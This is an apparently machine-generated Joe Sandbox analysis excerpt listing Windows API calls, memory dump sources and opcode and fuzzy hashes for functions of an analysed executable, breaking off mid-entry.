• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
• Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
• GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
• CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
• Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
• Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
• Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
• Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
• Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
• Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
• Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
• Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
• Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
• Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
• Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
• Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416C83
                                                                                                                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                                                                                                                                                  • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3808407030-0
                                                                                                                                                                                                                                  • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                                                                                                                  • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                                                                                                                  • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                                                                                                                  • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                                                                                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1095203571-0
                                                                                                                                                                                                                                  • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                                                                                                                  • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                                                                                                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                                                                                                                                                  • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
• Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
Uniqueness

Uniqueness Score: -1.00%

APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
• Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
• Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
• String ID: vLB
• API String ID: 1477829881-1797516613
• Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
• Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
• Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
• Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
• Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
• Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
• UnregisterClassA.USER32(?,00400000), ref: 004164AB
• RegisterClassA.USER32(?), ref: 004164CE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
• Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
